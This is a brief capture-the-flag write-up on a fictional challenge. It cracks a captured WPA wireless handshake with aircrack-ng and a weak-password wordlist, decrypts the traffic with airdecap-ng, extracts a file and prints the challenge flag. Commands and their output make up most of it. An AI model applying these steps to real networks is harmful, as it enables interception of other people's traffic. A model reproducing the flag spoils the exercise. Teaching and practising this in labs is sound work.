Hopefully, we succeeded to spy some wireless communications around Sciteek
building, our technical staff has attached the capture file, will you be able
to exploit it? We hope that some valuable files were exchanged during the
capture.
Please entitle your reply “captured file”, as usual.By the way, your account has been credited with $1000.
Summary: WPA traffic decrypting
Here we have a pcap file with 802.11 (wireless) traffic dump. Seems it’s encrypted, let’s try aircrack:
$ aircrack-ng sciteekadm.cap -w 500-worst-passwords.txt Opening sciteekadm.cap Read 345 packets. # BSSID ESSID Encryption 1 40:FC:89:E0:FF:D3 Sciteek-adm WPA (1 handshake) Choosing first network as target. Opening sciteekadm.cap Reading packets, please wait... Aircrack-ng 1.1 [00:00:00] 4 keys tested (300.98 k/s) KEY FOUND! [ 12345678 ] |
Password found! But sadly, wireshark can’t decrypt it, because EAPOL packets are corrupted/missing.
But there is a nice tool called airdecap-ng (thx to @kyprizel):
$ airdecap-ng -p 12345678 sciteekadm.cap -e Sciteek-adm Total number of packets read 345 Total number of WEP data packets 0 Total number of WPA data packets 55 Number of plaintext data packets 0 Number of decrypted WEP packets 0 Number of corrupted WEP packets 0 Number of decrypted WPA packets 41 $ wireshark sciteekadm-dec.cap |
Now we can simply extract a file from tcp session:
The flag: 7e4ef92d1472fa1a2d41b2d3c1d2b77a
1 comment
Какое было оказывается изящное решение если знать правильный софт :)